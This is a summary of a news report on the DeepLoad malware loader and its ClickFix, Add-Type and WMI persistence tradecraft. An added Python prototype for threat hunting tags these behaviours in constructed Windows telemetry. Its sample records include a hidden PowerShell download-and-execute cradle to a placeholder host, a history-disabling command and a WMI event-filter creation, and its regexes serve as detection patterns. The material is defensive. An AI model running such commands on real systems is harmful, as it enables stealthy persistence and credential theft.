DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials
Briefly

"It likely uses AI-assisted obfuscation and process injection to evade static scanning, while credential theft starts immediately and captures passwords and sessions even if the primary loader is blocked."
"The starting point of the attack chain is a ClickFix lure that tricks users into running PowerShell commands by pasting the command into the Windows Run dialog under the pretext of addressing a non-existent issue."
"DeepLoad makes deliberate efforts to blend in with regular Windows activity and fly under the radar, including hiding the payload within an executable named 'LockAppHost.exe.'"
"To evade file-based detection, DeepLoad generates a secondary component on the fly by using the built-in PowerShell feature Add-Type, which compiles and runs code written in C#."
DeepLoad is a malware loader delivered through ClickFix social engineering: a lure for a non-existent problem has the victim paste a PowerShell command into the Windows Run dialog. According to the report it likely relies on AI-assisted obfuscation and process injection to evade static scanning, and credential theft begins immediately, so passwords and sessions are captured even if the primary loader itself is blocked. To blend in with normal Windows activity it hides its payload in an executable named 'LockAppHost.exe' (a legitimate Windows binary name), establishes persistence through WMI, and disables command history to limit what defenders can recover afterwards. It also sidesteps file-based detection by building a secondary component at run time with PowerShell's built-in Add-Type, which compiles and runs C# source rather than shipping the component as a file.
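The behaviours listed above (a PowerShell command launched from the Run dialog, a download-and-execute cradle, Add-Type compiling C# in-process, command history switched off, WMI persistence) each leave a trace in telemetry most Windows fleets already collect: process-creation events (4688 or Sysmon Event ID 1) and PowerShell ScriptBlock logging (Event ID 4104). The following is an added example, not code from the article or from any DeepLoad analysis: a prototype rule set run over constructed records of those two kinds. The regexes, the `Event` record shape, the sample records, the assumption that a Run-dialog launch shows explorer.exe as the parent process, and the use of PSReadLine's HistorySaveStyle as the history-disabling mechanism are all assumptions of this example, not details the page gives.

```python
"""Prototype hunt for the tradecraft the summary describes, run over constructed
Windows telemetry. Added example; the patterns describe how these techniques
commonly look in logs, not DeepLoad's actual code or indicators."""
import re
from dataclasses import dataclass, field


@dataclass
class Event:
    """Minimal view of one telemetry record (constructed for this example)."""
    record_id: int
    kind: str            # "process" (4688 / Sysmon 1) or "scriptblock" (PowerShell 4104)
    text: str            # command line (process) or script block text (scriptblock)
    parent: str = ""     # parent image for process events
    tags: set = field(default_factory=set)


# (tag, regex) pairs applied to the command line or script block text.
RULES = [
    # ClickFix commands are usually pasted with a hidden window and a bypassed policy.
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("execution_policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    # Download cradle: remote content fetched and handed to Invoke-Expression, either order.
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b.*\b(?:iex|Invoke-Expression)\b"
        r"|\b(?:iex|Invoke-Expression)\b.*\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b",
        re.I | re.S)),
    # Secondary component built on the fly: Add-Type fed inline C# source.
    ("inline_csharp_compile", re.compile(r"Add-Type\s+(?:-TypeDefinition|-MemberDefinition)", re.I)),
    # One way to disable command history (assumption: PSReadLine history persistence off).
    ("history_disabled", re.compile(
        r"Set-PSReadLineOption\b.*-HistorySaveStyle\s+SaveNothing", re.I | re.S)),
    # Building blocks of a permanent WMI event subscription (WMI persistence).
    ("wmi_persistence", re.compile(
        r"__EventFilter|CommandLineEventConsumer|__FilterToConsumerBinding", re.I)),
]


def tag_event(ev):
    """Apply every rule to one event and return the set of tags it tripped."""
    for tag, rx in RULES:
        if rx.search(ev.text):
            ev.tags.add(tag)
    # Assumption: a command typed into the Run dialog is spawned by explorer.exe,
    # so PowerShell with that parent is the shape of a ClickFix launch.
    if (ev.kind == "process" and ev.parent.lower().endswith("explorer.exe")
            and "powershell" in ev.text.lower()):
        ev.tags.add("run_dialog_powershell")
    return ev.tags


def triage(events):
    """Return {record_id: tags} for every event that tripped at least one rule."""
    hits = {}
    for ev in events:
        tags = tag_event(ev)
        if tags:
            hits[ev.record_id] = tags
    return hits


# Constructed sample records; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    Event(1, "process",
          'powershell.exe -w hidden -ep bypass -c "iex (irm https://example.invalid/fix)"',
          parent=r"C:\Windows\explorer.exe"),
    Event(2, "scriptblock", "Set-PSReadLineOption -HistorySaveStyle SaveNothing"),
    Event(3, "scriptblock",
          '$src = @"\nusing System; public class L { public static void Run() {} }\n"@\n'
          "Add-Type -TypeDefinition $src"),
    Event(4, "scriptblock",
          r"$f = Set-WmiInstance -Namespace root\subscription -Class __EventFilter "
          "-Arguments @{Name='upd'; EventNamespace='root\\cimv2'; QueryLanguage='WQL'}"),
    # Benign scheduled script: should trip nothing.
    Event(5, "process", r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
          parent=r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for rid, tags in sorted(triage(SAMPLE_EVENTS).items()):
        print(rid, sorted(tags))
```

Each rule is deliberately narrow so a hit is explainable on its own; in practice you would correlate the tags by host and session (a Run-dialog launch followed within minutes by Add-Type, a history change and a WMI subscription on the same machine is the chain worth paging on), and tune the cradle and hidden-window rules against the legitimate admin scripts in your own environment before alerting on them individually.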
Read at The Hacker News